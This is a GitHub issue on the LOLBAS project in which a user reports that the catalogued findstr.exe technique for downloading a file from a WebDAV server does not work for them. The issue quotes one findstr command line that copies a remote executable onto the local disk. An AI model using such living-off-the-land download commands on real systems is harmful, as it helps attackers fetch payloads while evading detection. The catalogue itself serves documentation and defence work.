LOLBAS-Project / LOLBAS

Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
https://lolbas-project.github.io
GNU General Public License v3.0
6.97k stars 981 forks source link

Can't get findstr.exe to download a file from a webdav server #393

Open yusuf-madkour opened 1 month ago

yusuf-madkour commented 1 month ago

I tried executing findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe as explained in yml/OSBinaries/Findstr.yml but I am getting FINDSTR: Cannot open \\<Redacted>\calc.exe

I have made sure the webdav server is working and accessible on port 80, I can download the file calc.exe from the webdav server using curl, wget or a web browser.

I checked the resources mentioned in yml/OSBinaries/Findstr.yml and couldn't find any mention of findstr.exe being used for downloading.